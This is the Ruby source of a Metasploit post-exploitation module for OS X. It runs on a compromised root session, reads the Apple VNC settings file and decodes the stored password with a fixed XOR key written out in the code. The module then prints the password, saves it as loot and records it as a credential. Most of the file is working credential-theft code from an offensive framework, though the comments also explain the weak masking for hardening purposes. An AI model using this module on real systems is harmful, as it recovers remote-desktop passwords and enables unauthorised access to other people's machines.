
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/osx/gather/vnc_password_osx.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
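# Post module that reads the Apple VNC password file on an OS X session and
# decodes the value it holds.
#
# Security note: the stored value is only XOR-masked with a fixed key that is
# embedded in #decrypt_hash, so the masking gives no confidentiality to anyone
# who can read the file. The effective protection is the file's access
# restriction, which is why #run insists on root. From a hardening point of
# view the file should be treated as a plaintext-equivalent credential.
class MetasploitModule < Msf::Post
  include Msf::Post::OSX::Priv
  include Msf::Post::File

  # Registers the module metadata (name, description, author, supported
  # platform and session types) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OS X Display Apple VNC Password',
        'Description' => %q{
          This module shows Apple VNC Password from Mac OS X High Sierra.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Kevin Gonzalvo <interhack[at]gmail.com>'],
        'Platform' => [ 'osx' ],
        'SessionTypes' => [ 'meterpreter', 'shell' ]
      )
    )
  end

  # Decodes the hex string stored in the VNC settings file by XOR-ing each
  # byte with the fixed 16-byte key, then drops NUL bytes from the result.
  #
  # Surrounding whitespace (for example a trailing newline from the file read)
  # is ignored. Input that decodes to fewer bytes than the key is decoded as
  # far as it goes instead of raising TypeError on a missing byte.
  #
  # @param hash [String, nil] hex-encoded content of the settings file
  # @return [String, nil] decoded password, or nil when there is nothing to decode
  def decrypt_hash(hash)
    return nil if hash.nil? || hash.empty?

    hex = hash.to_s.strip
    return nil if hex.empty?

    # Static key shared by every installation; this is masking, not encryption.
    fixedkey = ['1734516E8BA8C5E2FF1C39567390ADCA'].pack('H*').unpack('C*')
    stored_bytes = [hex].pack('H*').unpack('C*')

    plain = +''
    fixedkey.zip(stored_bytes) do |key_byte, stored_byte|
      # zip pads a short input with nil; stop there rather than XOR against nil.
      break if stored_byte.nil?

      plain << (key_byte ^ stored_byte).chr
    end

    # NUL bytes are removed from the decoded string, as in the original logic.
    plain.delete("\0")
  end

  # Reads the VNC settings file, decodes it and records the result.
  #
  # Aborts with Failure::NoAccess unless the session is root. On success the
  # decoded password is printed, saved with store_loot and registered with
  # create_credential, so it ends up in cleartext in the console output, the
  # loot file and the credential record for the current workspace.
  def run
    unless is_root?
      fail_with(Failure::NoAccess, 'Root privileges are required to read VNC password file')
    end

    print_status('Checking VNC Password...')
    vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt'
    passwd_encrypt = read_file(vncsettings_path)
    # to_s turns a nil read result into '', which decrypt_hash maps to nil.
    final_passwd = decrypt_hash(passwd_encrypt.to_s)

    if final_passwd.nil?
      print_error('Password not found')
      return
    end

    print_good("Password Found: #{final_passwd}")
    pass_file = store_loot('osx.vnc.password', 'text/plain', session, final_passwd, 'passwd.pwd', 'OSX VNC Password')
    print_good("Password data stored as loot in: #{pass_file}")

    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: fullname,
      private_type: :password,
      private_data: final_passwd.to_s,
      workspace_id: myworkspace_id
    }
    create_credential(credential_data)
  end
end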